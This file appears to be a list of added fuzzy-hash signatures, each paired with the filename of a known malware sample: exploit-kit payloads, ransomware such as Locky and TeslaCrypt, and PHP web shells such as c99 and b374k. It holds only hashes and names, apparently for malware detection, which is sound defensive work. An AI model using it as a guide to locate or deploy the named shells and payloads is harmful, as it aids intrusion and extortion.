+6144:pAzSD8kyuJ/WiFCZ4hAPt8Z4cFHNfEm2drXr85rOpBm3zXKJhIlXTYMYutN2dZHI:pAzSD80BZFuF8VFda/8DFT4u0Zlbud,"image.055"
+6144:pAzSD8GmYpiKl9+Y04/8acIXosmplcz8/qbB0HZ09+INQei5ygZgIFzg6wE+k1Tw:pAzSD80gQ068yL8f0ZgZgI66lry,"image.3.028"
+6144:pAzSD86aulSw/8aqIfLr2KHyv3t0IfTUYRTwqSuQVZ7UgunL6dkAs26GKTJ2:pAzSD86aUSi85TTNRcMUdUgumRs2pp,"image.3.041"
+6144:pAzSD82ZnfXtUBt1IZT+7xmyjiCZhAWqJLxKfzNtaemgJxW9tuzi3rRHOf7jwYoO:pAzSDvVyBDyEjhhsLAb6ezJEt3JFHu,"image.5.025"
+6144:pAzSD7ZnFXt20tQct3j2IX3QlZfocJLxKfzZDkAz9aeCsbn2faWtubLy4r8M2:pAzSD7Vd9jxQlZftLAb1k7ejoLIy4Q,"image.5.018"
+6144:pAzSD7uyY3fAWt1uerW7ZTpKhxykn38JLxC/GRPaeUscfy1cUYhyC+Xll+VuP22:pAzSD6yODDDPSL4ciekc8yCUv,"image.5.033"
+6144:pAzSD7ky8NekOirJu1Pt8P6L6aiNBmae7KN8wxlo+IdLsRH8VzklUzoq3dNpjCvy:pAzSD7yekRr6826aSeA8bLTxklUo0n/3,"image.070"
+6144:pAzSD72th4ofkejZpDO9m0CZhAWqEHRubDk1pgaeW8dRqWqSHy1DRwQf7jwYo22C:pAzSDqr1MOlh4/k1pNeDtyU/2B,"image.5.031"
+6144:pAzSD6yfxecsmqwh84el/zi4evBrn4T6/zyoOQWEXYhyUOhppL8lAXV7fE1VGCll:pAzSDfMcVqwXeoZdOQ98lIfel0pYMAb,"image.003"
+6144:pAzSD6nW2APl39PciV+lMsO2d84AY9YPYVQbmPk4S+G6pYn84Shx5oGO4eqq0y6U:pAzSDAWxgi4vzKEe+G384SR9Byvm0,"image.374"
+6144:pAzSD6Em9Yc+7w3sgZIbmqjqN85xyk339fovJHJRDk0VT+Ks2krvkbME+RLB6LjR:pAzSDrHfPjE8p9fe9kS++iRLB6sxy,"image.3.088"
+6144:pAzSD62ZnfXtUPt1XH0GgIX3QlZfbTp+ubDkAz7nZwVmRmcFJrR8Ef7jwYoy22:pAzSD9VyPD3NQlZfbTf/kTARnJObyL,"image.5.022"
+6144:pAzSD60UySkgnDs0wmElrdKKGliOLxKNz8segCCJscQK8qRTZUG84Yf7jwYoqW2:pAzSD6ty44clNLARHegVsc9jRqAqr,"image.3.082"
+6144:pAzSD5Yy3de6Led3b04mex/fpOG899k9lyf+amH7KiN/Q5FGenOmgPqUbf7jwYbR:pAzSD5Rde6LibBpOG889lyfrOle3gCm,"image.492"
+6144:pAzSD5yT3/vr/m437bF8d4eBJyMKm/syTCjRGOh4a8tqOpccY8mVHTYMYtukEnzJ:pAzSDWPvTma87a0CjRFhJ80xT4okEzog,"image.027"
+6144:pAzSD5pSaDiggq3s+c86iBhboK8m2ljnLaFKVqbk3G0HG2opCd1fb1eVrG5o6ijO:pAzSD50nxyg8np8ljA2op0boDknVzh,"image.8.001"
+6144:pAzSD5pET4iTwSSCwl/Ce8zRjLr4hjy8liOLxKNfpczwaQzWHyiGcll+VNP2:pAzSD5eT42sB8jAhm8lNLAVptaQZcB,"image.3.071"
+6144:pAzSD5mcy4djnRWK4qPLiBhAceQ+w+z822ty8ltR9LWYYYk2WeVQpWuW+htT3pTb:pAzSDlyWR4x2N8c8lRLzYdpX,"image.543"
+6144:pAzSD5Gmmy20kJd9+RCb1sX7TczF4yGkb/e8lu2tY3tDfbowLWYUVDkqbkaWmeVj:pAzSD5Sy5kOc4aGkMhfbLzqkDGoMhJw,"image.13.001"
+6144:pAzSD4kyup/Gf90/mpZf6Bh4cFHNir3IFjAIPImFyl8lnGlQTYMYutN2BDNbXKJa:pAzSD40hGymrf6HFdFjACO8lHT4uze,"image.057"
+6144:pAzSD4im2aliw7ZIKb0lQ4ozEdB/fAs+DB3ejbwoXYhzhFW+nYcXmVeb6BjkAgpf:pAzSD4ptlb05eejbuZ5EkAgpPwHg,"image.019"
+6144:pAzSD4DmfnlOlO4AGIKBF4KkqN6dc6K1gmuOStxJHxNrIxV8fqwC9Hyky/kVhzoA:pAzSD4AnlNxtKkCqOSLRrGy/kVJo6WS,"image.445"
+6144:pAzSD3yPyHylIedBiqPbI4O4qkvOJWwFKqDvayj4+ohMx8XesFIC5LU6HJ/xByp4:pAzSD0yUDizkTyj4Xhu8XXLxHypLhKT,"image.472"
+6144:pAzSD3mcyEdKwa9+YihbdiBhNoqu1dxJ0Obm5W3tNJCHjMoop55RaESn2Vu8Cb8d:pAzSDby0+i4jNA250bzoop5bm0FcQ,"image.554"
+6144:pAzSD3mcyEdKwa9+YcqPP8d+yUG7jZLiMQ906oFLWYPaukdfsoVu86b88ApPV2su:pAzSDby0+cg87NjDLzC7S0pzNQ,"image.553"
+6144:pAzSD3kyuJdm9+ZxCi4ozENkkW8yMKemBmgaieJhM85XTHzXVxXmegd/pJqEESqm:pAzSD30z3ykDDBuhM8Bc/eZAR,"image.047"
+6144:pAzSD30eQ2KP/yArPx4endbV5T33fgaHQxUprUgiS/r0FE0IyZhWhnVfPERXjSaW:pAzSD3TWKALxrfSxUprUgBOIgWtPERW5,"image.15.001"
+6144:pAzSD2ZnFXtBWCejC/mtvAWrmLxKfzZDkAz9BddDaWisUiHyPdVZll+VVoy2:pAzSD2V1QNCLAb1kmDABiHyPd3l,"image.5.014"
+6144:pAzSD2yPyHKusmqSt3h3rF4yBpKngY/cvyuOFYohMx80IxzOippL8lAXVSj1VGTD:pAzSDLyquVqa3hi+vRODhu80s8lpq,"image.474"
+6144:pAzSD2yPyHKusmqnt3h3rF4yBpKngY/cvyuZcjl1GdKTYMKU0zoGEfvLz7y2:pAzSDLyquVqt3hi+vRZcpTqnoNP7n,"image.473"
+6144:pAzSD2yhBqMhzLP5k4dPKn976n4YcjKoJjeXYhahIf/oGLTX8la41/aGpHyhm5qt:pAzSD1BTzlvMjKoJqhE/p8lNB7VE,"image.434"
+6144:pAzSD2+pyW8W0mqsaI4O4ckvOJy4nQBGIbPLsmL8lAXVcf0sudKTYMKmUhfm1llR:pAzSDxyW8WdqKkP6qb8lTfLTqxe1F,"image.466"
+6144:pAzSD1Tnqzb3bh4ymkbQpMgR2z7gei7XR2S2PBmPhIxmHvirHdBTOZju3OCDll+Y:pAzSD1Tn2bXmksXR2oe+ieZCDh,"image.484"
+6144:pAzSD1mcy4djnRWThQa4yGkbMyUseWoDj/b8lxR9LWYGYkHOeVwpWD86O4EH+hsL:pAzSDRyW4ZGkXH2D8ltLzG8iQ,"image.544"
+6144:pAzSD0Gmmy2zHQVnsFGT5iBTDyUHrlWhSKKqt8lyfx0HGKXaYWLuYJ+88kxsKN1q:pAzSD0Sy2wVnQVyBhX8lyfzihLi1q,"image.6.001"
+6144:pAzSD0Emj1c+n3sgvIVujf2hjl39fovJHJApa+ckbK4JSGDZYf7jwYoqA2:pAzSDNQrfj+h19feApa+a4EcBqt,"image.3.084"
+6144:p+9mZiC+IxeLfAf+2DcLFNvFGdSeVpx0Z2tfe5rVBoZv1cuqbWHXeF1VkcEF7m:p+9m0geLfb22FNMD1feNVEDXeJ1sm,"2016-04-07-EITest-Angler-EK-payload-second-run-ursnif.exe"
+6144:P1Hoo9fGum19Jdu3opSUjhndm7xzUiDCvLcRPWfPXNEtwgb+dGj58hS:PT9f/41jhnE9hwEtz3tK,"2016-07-08-pseudoDarkleech-Neutrino-EK-payload.dll"
+6144:OvwY6m6U6doHuKqNHCjJq/XAe6AUfJmx1gGzUKLw:Ovwbm6po3qNHSJOXAe6qbgGw8w,"cache.php"
+6144:OU33L1qwojAG0oCXdSMrZbRuHCHjJ1Dzut67:B33doj10Nw6bRHDe,"2016-05-25-pseudoDarkleech-Angler-EK-payload-CryptXXX.dll"
+6144:OtTwa9rqKvFp7Ba/i+v/B0eHd9vX3SIHevr2XW0p0aDkFcSHXeWDGDAESJ:Otn9zvFp7U/i+vzHd9vX3SI9G0p0aDsL,"Adminer - Compact database management.php"
+6144:OmPMoKY7hVrZJiFt1p9SU5mpzgxnQ700wMPBk/wxDM38YDjQxRCJn0VSeZsJwZrD:Omd7aFKUkgxn200wMPBk/wxDM38YDje5,"fbi.php"
+6144:OfWNZHUaTKiQxeSt+YYFv874oQhxccPzXdsbNAYwGNNcX/si2A0:Of+HUaTKNeSAHva4gcPzXddYw2A0,"adminer.txt"
+6144:o4nFAlgcDRSPQyKYAWg1os+rsKVXVItCcdf0ua:PnelZhyK3lLCEdb,"2016-04-05-TeslaCrypt-from-malspam.exe"
+6144:Nx8XqtWu8Zs46N810P6fSHztOHEzOu9Ww:Nx8XqsuciS10l8CnJ,"2016-07-14-Afraidgate-Neutrino-EK-payload-Locky-example-1-of-4.exe"
+6144:nuU4My6j817/7TodFsGN858k31BSZW5lV3QfZ0SHKDGiRX8AeZ+oDsCgu77+YESv:nuuyt7jTodFzjUD5AfZ0cUGW8V6QcAHd,"2016-07-20-EITest-Neutrino-EK-payload-after-classical959.com.exe"
+6144:nK439JaWI9LcZa6oLiEp0eMqx+AvZFFGQWl/bqG+qd6D3kQ:n9aWhTa+Ah2l/gqQD3kQ,"5.jpg"
+6144:n/azLQ+Hquo0KS4M8f0uL+qURUgVW9g+FG:Fs/oVS4ZT+qURUrjG,"2016-03-29-pseudo-Darkleech-Angler-EK-payload-TeslaCrypt-after-onebusiness.ca.exe"
+6144:MvPl36xdPWGmJ9xAma5SMEm8mmDBhLuM60fMxzQJHnn:MvPJ6xVWG89xAHfEm8m4H60gQJHn,"2016-06-02-Rig-EK-payload-after-pavtube.com.exe"
+6144:MUwf8XgzgSrVTQq5VD3ynB+0hcD5YjKVHJ:c8XgzgSrdQuVD+rh65YGVHJ,"fso-ASP.txt"
+6144:mqVwmvG/frujNoN11V24CIUHu7cPsPsjxy1T36:HG3rYcWjuAy1T3,"2016-04-26-Bedep-post-infection-click-fraud-malware.dll"
+6144:M+gTCcLPHQCtduQGFIcYLvkGHUZnPPZDN0v1puMCbUz0qfYeQpxXsz8HuEpMn2Og:tkCcLH/dTGacYQGH3J0MYeQp+wl,"2016-07-20-pseudoDarkleech-Neutrino-EK-payload-CryptXXX.dll"
+6144:mApvD5AbHWE6bxBe5vGW7ciOQgNXeq+wsLEnu4+56:mApvD5AbHWEm7e5THMNXejl6,"AnonGhost_Shell_Priv8.php.txt"
+6144:lvP8OuzCQ1pTBJ7dXbbEKAnbCqxZjLyvnrPBuD:tr0pTrRbb5An7jLJ,"2016-07-19-Afraidgate-Neutrino-EK-payload-Locky.exe"
+6144:lRrw1TodYDFtx8thRi6Bic8789IGMo5p/E/ESs2jxDW1Rz7WXiEpSLS8mDSrSaSb:3w9odYBtCtDiiic878v/E/42jxDW1Rz6,"maqiecious.tcl"
+6144:LK5oatcztRpMzYejY/Sj10/vb2ibk+0gxYbtRiWtD3au0d9VYCv:+tczt/0jMSj103b8+TxeLiarard9VJ,"ALFA TEaM Shell.php"
+6144:LJOpvREsQKjfacL4nsdTaRg7AMS7J3q3Oj0aR:LsptQKjc4rzSi,"2016-08-01-pseudoDarkleech-Neutrino-EK-payload-CrypMIC.dll"
+6144:LiuT7oB8FLJ13Z6VSZF5MUPzfw5Mqa4Y:L90BI6cRV9RN,"2016-04-07-EITest-Angler-EK-extracted-DLL-from-silverlight-exploit-krmmL1LNhwx.dll"
+6144:Li+UKmnhNrTxwuXLm8nprLwsXsdee7os:nUKmHrtF13XIee,"2016-07-12-pseudoDarkleech-Neutrino-EK-payload-CryptXXX.dll"
+6144:lAzSDz0HmZIfXt1UTtoVdmP7xAGfTpM1py+kfaRwByEXkp2:lAzSDzu7UBfT61pNuaRdy,"image.5.047"
+6144:lAzSDyzyJNXehiu+QbmYC8hH8xlTpMxdUFsr9WISgR5VwpAUt2:lAzSDyzyKhiOhH8xlT6zUh0GA,"image.5.067"
+6144:lAzSDW0HmZzXt1UTto6Z7+TZPP8HxA33wEHK/7LOUZfaRwiSCoE3w0yP2:lAzSDWubBK8s0jRaRO1Eb,"image.5.057"
+6144:lAzSDV0HmZbft1Jk3tOC8hi80p3CEHk1a3Op1fYWZFcaOyX2:lAzSDVusfDNhi8kDsfC,"image.5.049"
+6144:lAzSDU0HmZWqUTto6Z78TZSP80p3CEHWDkKpft9zwRZSxRPqTf7jwYovS2:lAzSDUunBx8kAkKpfzMKnvH,"image.5.051"
+6144:lAzSDU0HmZFwcxTto6Z78TZcC8hGxAGfTpM9xkKpdea3Op1IYWZFcPfSiEEFyE/2:lAzSDUuBWBvhmT6XkKp1sIofPEX,"image.5.050"
+6144:lAzSDs0HmZIfXtUCt1iZ78TZjh8u3CEHk6n+X+SwwjjfaiARPOBf7jwYoqK2:lAzSDsu7yCDJ8uNpl0fnKOmqv,"image.5.046"
+6144:lAzSDs0HmZIfAkpe/k3tOZf3QlcJLxCzfqX+SwwjffiEEXAll+Vyi2:lAzSDsu7hpEQliL4Zl4fKEvr,"image.5.048"
+6144:lAzSDp0vcZFwJBtnypFQtQC8hm8MJLxCgNDkk/ccsCwWIRwZFj2j2:lAzSDp2fABhm8SL4SkPb3RQ,"image.5.064"
+6144:lAzSDo0vcZzXtUpeiYmFP8HxA33wEHK/KaxsTwtDWiIRwiSCgJQCf7jwYoVr2:lAzSDo2lpD8sMhiROgV6,"image.5.060"
+6144:lAzSDK0vcZJCqiuUQtQC8hm8xlTpMSa8PJWLIRwOFTjll+V4L2:lAzSDK2Lqi9hm8xlT6SrTRZQ,"image.5.063"
+6144:lAzSDj0vcZzXtUpeiYmFP8HxAp3QlcJLxCg3DkywtDWsIRwiSCExFG/ull+VZeg2:lAzSDj2lpD8qQliL40kX8ROdmm1,"image.5.061"
+6144:lAzSDH0HmZWqXTto6Z78TZgP8HxAZ3QlcJLxCzFn1a3Op1rfpRwiSCLiE7/ull+i:lAzSDHuIBb82QliL49YsLpROPE7mp,"image.5.053"
+6144:lAzSDe0vcZzXtUpeiYmIvpJLxCgAk3HwtDWsIRwiSCR3wBull+VmZ2:lAzSDe2lpGL4Xk3k8ROcxw,"image.5.062"
+6144:lAzSDD0HmZWqXTto6Z7+TZgP8HxAGfTpM9LOstFYWZ3PfzTf7jwYoTJ2:lAzSDDuIBd81T67jlfMTo,"image.5.054"
+6144:lAzSDC0vmZzXt1UTto6Z7+TZGC8hWXTpM93DkeaxsTwtDWiIRwiSCgJQA/ull+VZ:lAzSDC2bBDhMT6tkjhiRO3mm,"image.5.059"
+6144:lAzSDC0vcZJCqiuU8TZzfxAp3QlOEH1sqQtJWLt1+RHVw8Jull+VFcr2:lAzSDC2Lqi3QlW/wkDgk,"image.5.065"
+6144:lAzSDB0HmZzXt1UTto6Z7+TZPP8HxA33wEHK/7LOUZfaRwiSCoE3w0yC2:lAzSDBubBK8s0jRaRO1Ea,"image.5.058"
+6144:lAzSDb0HmZGwzLt1uj3t8C8hJ3QlcJLxCzgmVFYWi3Pfp4JQF/ull+VGeM2:lAzSDbuiHDlhVQliL4l7efJmc,"image.5.055"
+6144:lAzSDA0HmZzXt1UTto6Z7+TZPP8HxA33wEHK/7LOUZfaRwiSCoEDJQA/ull+V5e3:lAzSDAubBK8s0jRaRO1Evmn,"image.5.056"
+6144:lAzSDa0HmZWqXTto6Z78TZeP80p3CEHWDkKpft9SwRZSxRPtFyR2:lAzSDauIBl8kAkKpfzlKD,"image.5.052"
+6144:lAzSD1zyJ1Jeto6Zoz3xAp3QlFTpMxdUFsrdfEIRwrF0AU+2:lAzSD1zyxYDQlFT6zUEpR33,"image.5.066"
+6144:kksJDAqfB6Bk68cfCqhDsqqeLYdP/mN1di5/pD0NodxlITfeq5:/S8qfp6RfCqB5qeLYd3mNK/pD0NoK55,"locus.txt?.001"
+6144:ki/El/dvEjQ/KVuMO+76XmlWe3MXxtfeLb0ED+cZbPub/Du:ki/EPsjQi4Fmln3Wxt2kED+cZLub/K,"flash0day.rar"
+6144:JWcvXMddxNhWfXBiGWZidG87OXL/hfCejrMEHLrwmMZiNTHwxYniaJYgP:QKXVGMchDHwoYgP,"2016-08-05-Cerber-decrypt-instructions.bmp"
+6144:JnkDhKDYcCTNboKO3JyAe84M5ZdBCeX/tFQthMJqkTvJhh6434uxf:Jn+6YcCJe4M5tCOPyhM4kdh843vf,"X0R-USB_Jan2009.zip"
+6144:JEM54P5sA4JAiSAFThL2H2bpbADcL6kMC18sTf:qMusA4zSAtwWtES6mf,"2016-04-18-C-Users-username-AppData-Local-Temp-15BA39EC-8171-4EBE-837B-3EDA6605A12-api-ms-win-system-rasadhlp-l1-1-0.dll"
+6144:JB//roLzdyKz35onXS4sh6JSrAvuEdf2Jg8s2jj:JJTUW9YnrWdOO8sE,"api-ms-win-system-acproxy-l1-1-0.dll"
+6144:J0xxe+pkOVMYdW9P3vccJQUMDStoeYiNn:JMe+pkOVMYdMP3vccGUMDStoLWn,"c100.txt?"
+6144:iWvI1LTqyXZ8qfTgpRnQPvUaNEfpWNj1I8FjTq4E+:i8Oh8QTg7UEKj+4Z,"2016-07-22-Afraidgate-Neutrino-EK-payload-Locky-second-run.exe"
+6144:ItXtBAodZjmLXqbTSGEFg8Ry2GLBMsrRZYigiMyUaamEayW1pbl:W9dpJbWvFgzD5oWMyUwNl,"2016-07-22-pseudoDarkleech-Neutrino-EK-payload-CryptXXX.dll"
+6144:IeBv4ybOuTvhNZ2PhWakwSAwbiPUuXikW1wvaycpvDfIRTgl7:xV4rYvh25WQSDGadfES,"20150903-184307-VeiGolLEGQ4ABRflEjQAAAAI"
+6144:IBY4pLgEYks/+danDM7XxkIjrnbJZwEEQrvqu:P4pLgYs2d6ChkIX9Z5ryu,"urvzm.zip"
+6144:ibfOr/ad/LQs19RaLb/dnYbl4Ilcb5bQQ6lgbFBal76oWq7Iau0YZQJ908lsaof2:dr/u/8s19RydnY4HXOZT2X/mOeF,"404.php"
+6144:i21wGM1vrze6M+9NEyalfv6ThlHKKIQO1rY+Wfo2+woliFSn:iswBjC+9NEyVza1uDFSn,"2016-07-15-pseudoDarkleech-Neutrino-EK-payload-CryptXXX.dll"
+6144:HNYmuCIVZCkB1KSDmLXjF7BYdeIWxCo1:tEXCW1Kqm7rYiZ,"2016-07-29-EITest-Neutrino-EK-payload-CrypMIC-after-carolinagodiva.org.dll"
+6144:Hnr3/VUycwaqj09KsentOTk/MD807aVLqX/QPInM1nGnr52npnz1Rnf1n0i67:Ls9Ksen+kkD8jLqX/QM,"2016-06-01-pseudoDarkleech-Angler-EK-payload-CryptXXX-sample-1-of-2.dll"
+6144:hLWwjEK+J2oqIwkldx2+GRdBEDgZZsgUoz/F2n9X3fWjlXTcTBcVZcpCB+9KaSS2:kwjEK+J2oqd8dx2F5ED9gPzt2n9XQZVp,"2016-03-21-TeslaCrypt-after-Bedep-infection-from-Angler-EK.exe"
+6144:HDw001+N4CVTbyAQvGPnemQzb4AMXBx8R8va/+h3ey6:HDw001OPylGPem8jMX8RT/g3eX,"Crystal3.jpg"
+6144:HCJjfG4kLZjd1Jrif+D2Uam7ZV2JmJOmgHCXZ6kAoDwnkpy2yRTbP6shviYzFqHu:+G4KVd1Mk6DJm3geZy0ck5ylpieAHu,"11055.16234.php"
+6144:HbDv81MCTEdLuh+nwKu6S1j/vuAwgun8R6h8bjlh6zFQkaoD/9:HPE1MCTzhFKun/vuvncPWwe,"ws0.php"
+6144:hadzoVjckX2JD+hiUdZhvt+P7CsD5cBCsF:EzolsUht+rNsF,"2016-03-21-file-dropped-by-Bedep-in-a-directory-under-the-ProgramData-directory.dll"
+6144:H1Z5EjnsAObXf6mfkoSdPMotb68dWg0+KdGvlZnbJyW7nr:VZijObv6mMoCMotegt0/GvlZnbdrr,"2016-03-24-pseudo-Darkleech-Angler-EK-payload-TeslaCrypt-after-macfly-studio.com.exe"
+6144:gUWKdIWEoaLVGso7KYmWG2xkPzps3v3KLE5g:9WqItVEGPWg,"2016-04-13-pseudo-Darkleech-Angler-EK-payload-TeslaCrypt-after-medical-library.net.exe"
+6144:GSJqFW/Tet8PyA4Sz1pgIXHxxTxIoBqLSKoNW7tF4wIBxp8+:IFomm4SngsvxXQDD4FT8+,"2015-08-13-Angler-EK-and-CryptoWall-3.0-artifacts.zip"
+6144:GOJWu1GRLGGZgmKaVpo7KnhM7+vXcaWfY3sx9Vfcw+:GOJl1MLZa4po7KeSkFuU9pP+,"2016-07-25-EITest-Neutrino-EK-payload-CryptXXX.dll"
+6144:GnjjdhOcHFJyC1Y9gMIby8VRXUkygHPrXx:Uh5FJyaY9yVpUkygv,"2016-06-10-Rig-EK-malware-payload.exe"
+6144:gDens7gWbn17aIxs00xlJZbnWAzJWt1Q5yckUuMxhvaAKNvy:gDeseIxs00xlJZ7WAzS1QbxsAt,"2016-07-05-Magnitude-EK-payload-Cerber.exe"
+6144:/g861P8KVQDSMJZxaL0VNlKy/mqxtG8VRf9F4cGA6o:A1nyeMJZWy/mOv93,"2016-07-27-Afraidgate-Neutrino-EK-payload-Locky-second-run.exe"
+6144:fY2oqn/ZECGMX64yiUYtETyWExoyZyTUdAtyihm/uHgY2f:w2oqh/1X5yiUYtgyLeyeUnihdOf,"zorzor.php"
+6144:/FTsPtVBzQJLe1wm5wxszGaMtqGWU5RXMpS8fhkWLTFYoBQJl3u+sJ:9wPtV9a0wm5wxs6aMt3Qdfhkk/6K+2,"dll.dll.exe~"
+6144:fr69dFFV8jw36wXaNLurjituutFBmKEBajKzOok9ODjuhU:fr6jF/Ow3CNLurHkYDju2,"c99unlimited.txt"
+6144:FmCYFKZcWV3l4E8txoOJ5SJUxo1hvdaNYqe/roULOYx0JusHzAW:35WWV/87raJU+1hvMN7e/rogOYliF,"bb.php"
+6144:f7WQPhI4qVUAwejnVQW0bL77GuqiTZl7Pi+8Og:LDqxb0+up8Og,"2016-07-26-Afraidgate-Neutrino-EK-payload-Locky-second-run.exe"
+6144:F7HVnZ/ElLC7cvkK4YDJInbd5id4J5sY7oMek/+be:FBn10s8o7r9oMe3e,"密码：889.asp"
+6144:F07eFUARnR8baM0cnzZk5xH5POPDVJtvuRvmI5MfQZyL:F0iFUARnR8bhnKt5GD3WFMdL,"2016-04-19-TeslaCrypt-sample-caused-by-the-malspam.exe"
+6144:et+pTF59B1iI/ONTdI/1SbB5QX6rJ0u8tXc:esPt1EldI/gFGX7u8S,"2016-03-29-other-Angler-EK-artifact-retrieved-after-Bedep-infection-2-of-2.dll"
+6144:eoFCkEKdIldCUZfZDW1cdCOoccr31PzSNvBhb:eoFCydGZfZDrCQcr31cvL,"ca.php.001"
+6144:EmYPyiPsybvY+K/D8AsoClalvMJ42Do6/GVEtUf1kKq+e:uPjPsybA+a8xlalUJ4+ooWacSB+e,"Private x0rg Web Hosting Bypass.php"
+6144:ejmKxvm/IGlk0+ZlntVT9zSRyqJv257BFby/j7brEumv+cxQ:ejRxe5lk0YT9eOBmjP4jt,"2016-06-23-Neutrino-EK-payload-CryptXXX.dll"
+6144:eg27Uw8daScG0pxiOhHeFif/XPNn++iHTX5Kj:en7UrdaSd+Bd/l++izX5Kj,"2016-03-04-EITest-Angler-EK-landing-page-after-morningsidetennis.com.au.txt"
+6144:eg27Uw8daScG0pxiOhHeFif/XPNn++iHfsX5Kj:en7UrdaSd+Bd/l++ikX5Kj,"2016-03-04-pseudo-Darkleech-Angler-EK-landing-page-after-printermedicbedford.co.uk.txt"
+6144:EFIKQfMY3pyv7lP2uihnCwmiT4CAYMIVv:EeKeMY3pgx2uICwmi6YMQv,"2016-08-24-pseudoDarkleech-CrypMIC-decrypt-instructions.JPG"
+6144:e+EhdDy58lb18FDVygXVIAvHSmr8Gy5+/ZxN+Y4SbXFr:e+4du2lb16DIgXVIyS7aNp,"2016-06-21-pseudoDarkleech-Neutrino-EK-payload-CryptXXX.dll"
+6144:ebr9o5SpMXP+asKWiF4ZN4UExzUCYDWNFgIe6ceUYUdWcdVxGJbPWQtZawYpNJvR:ef9o5AM684f4UEx8Dce6NOVxG5tt8wYX,"2016-07-19-EITest-Neutrino-EK-payload-CryptXXX.dll"
+6144:eavjatcztRpMzYejY/Sj10/vb2ibk+0gxYbtRiWtD3au0d9VY13:ctczt/0jMSj103b8+TxeLiarard9Vs,"alpha.php"
+6144:eApvD5AbHWE6bxBe5vGW7ciOQgNXeq+wsLEnu4+56:eApvD5AbHWEm7e5THMNXejl6,"Anonghost2014.txt.001.001.001"
+6144:E3Fgz/vYiBiNyJnW8aZ+4guWctfsSMDeHrCcAQFZCymWP:EevBhH2bVmWP,"2016-04-06-pseudo-Darkleech-Angler-EK-landing-page-after-latchamgallery.ca.txt"
+6144:dv861P8KTjeUg5UKkFSOWmJbXh2uJzxNuBYAn:h1n2Ug5UdoCXh2RBY8,"2016-07-27-Afraidgate-Neutrino-EK-payload-Locky-first-run.exe"
+6144:DsOG0RxS910jZNiyOqf6XQcl3MTyNAU8ylUp2YR:DVGad9Yypf6XQAcMBM,"2016-06-20-Afraidgate-Neutrino-EK-payload-CryptXXX.dll"
+6144:dGXWgUwdRtFmqzrQO0HRk7hxr9e5GMPSk7E5Dr:dGXWgUcRtFmqUTRO9Nk6,"2016-07-25-Magnitude-EK-payload-Cerber.exe"
+6144:dbqk4YdkLGNI1XxozLhZARW8IcVrrDpBzqyN+TAZl5h9BjTP:x7KL17oz4RWlexfZl5d7,"2016-06-30-psuedoDarkleech-Neutrino-EK-payload-CryptXXX-after-austinbioidenticaldoctor.com.dll"
+6144:CU33L1qwojAG0V2CXdSlrZbRuwCHjJ1Dzut67:d33doj10V/wrbRGDe,"2016-05-25-Afraidgate-Angler-EK-payload-CryptXXX.dll"
+6144:cPQMD/gBOxNissAzm4mZEp+yNTU23vktHwMi7+QfHlTg5TZ16up15YOYs1E1FQLV:cd/qOzissAzm4mSZB7+qCYOYs1ETwGdm,"b374k-3.2.2.php"
+6144:Cm+UtgTlkkAZzPZ2qjF5T00/RcxFWTvnn9MrrUm2LXBJ:Cm+5E/Xp100fvCvsLxJ,"2016-02-09-Angler-EK-landing-page.txt"
+6144:CMMk2oMB/kPvG92RF7QcU1OXkF2lu5Bx10GPElpP0BsMB4DRgbvdk3Ooa5+mNIDe:CjQJPA23LU12kwe/10GH3YuTdk3kriPW,"AFXShell-Demo.zip"
+6144:cKxMdAXGL5IA5DIWWbBtzoklD6ShckH+U7QCyGPZ6GkUFJn9UANO7gRnhx5bOgvA:cKxkA22WDhEBtEklDiSXbjVkkJaANsgY,"2016-03-21-pseudo-Darkleech-Angler-EK-payload-TeslaCrypt-after-jacobwirth.com.exe"
+6144:civ7CRmxFVy884kOOegH/fkuc8P7W91H4J7ToSO9EFW0Ordg:cijCRm489kregHEuc8i91HqTviyhOrdg,"2016-01-18-Angler-EK-landing-page.txt"
+6144:CIkSVdRB03aA9X3ExTqoENp8vRHlwhvOp5Qg2CqZ3R6:n5E3j9cTq2RH+WpGgCw,"9df6ed1b984b7a9f5e7adf1f044c09bb_php.txt"
+6144:caZw7TodYDFtW8tgHiRuiO8U82aGyE7XzmzENe2KDDcJMx6AQgJUSKSFmDSNSfSn:ZwXodYBt7t2igiO8U8Qzmz72KDDcJMxn,"maqiecious.tcl"
+6144:bXGH1etIbJGB8BQaIft3N9WtQ/qepnN8qvpw8ZMx08UN6TLsafXs:bUeWPBCMxUN8qxw8ZMx0fGLsaf,"2016-06-30-EITest-Neutrino-EK-payload-CryptXXX-after-cliniqueh.dk.dll"
+6144:/bstBAodZjmLXqbTSGEFg8Ry2GLBMsrRZYigiMyUaamEayW1p8l:/w9dpJbWvFgzD5oWMyUwCl,"2016-07-19-pseudoDarkleech-Neutrino-EK-payload-CryptXXX.dll"
+6144:brxWt4XeqcqhtmOQ0iHfpC3zpeSllIisepnI6JGZHLR/fZI6ON077HC1bK/z4ylP:PkzV/pqzkANktfZcEiJK/z40,"2016-03-18-other-Angler-EK-payload-TeslaCrypt-after-1nationradio.com.exe"
+6144:BmmW/aoBAagBVsoh/W7SfuICxcs2KSxqlOCkpwNxfdZ0vmLqLWBhSOH49yiY+QoT:BmmW/dFwTW7Yaxcs23xqA3wNxfdZ0vma,"2016-04-06-pseudo-Darkleech-Angler-EK-payload-TeslaCrypt-after-latchamgallery.ca.exe"
+6144:/bmfjX50+1xeV5rZzUGROYus2QwPTB1rNXSuygkgbLjhqz0e4:sJBeVBSzs2QOiuygPbPUz0e,"2016-06-30-EITest-Neutrino-EK-payload-CryptXXX-after-4county.org.dll"
+6144:bK5oatcztRpMzYejY/Sj10/vb2ibk+0gxYbtRiWtD3au0d9VYCn:utczt/0jMSj103b8+TxeLiarard9VR,"ALFA SHELL.php"
+6144:BBBMET/1jbncUoPBdvgP4JeARusCa4H6kfFUPl3j+eJC4H:BBBMET/1HBo5RmNs+Q,"2016-08-05-EITest-Neutrino-EK-payload-CrypMIC.dll"
+6144:BA1V+Dqj8w3atc4NYIX0AJZHuaYDAUPdqnRH1bfAJvE8VutjQzo:BA2KMtcSYIXLHua3XBoK8VgjR,"2016-07-11-Afraidgate-Neutrino-EK-payload-CryptXXX.dll"
+6144:aYikIk11ln0PNKtTA8e23FpTYjaweVdDWU5kzj6GL6MxNKUaUj3:okDliNmA9RVkk/6G2Pyj3,"2016-07-18-pseudoDarkleech-Neutrino-EK-payload-CryptXXX.dll"
+6144:A/T3zd9AVAixibDqwbKhqjX9kjeKHYFqoECLrLnZF7tGUP+BgkTbXD/3/:A/XM4DShe9EcHPLrLZ5AICgkTP3/,"license.txt"
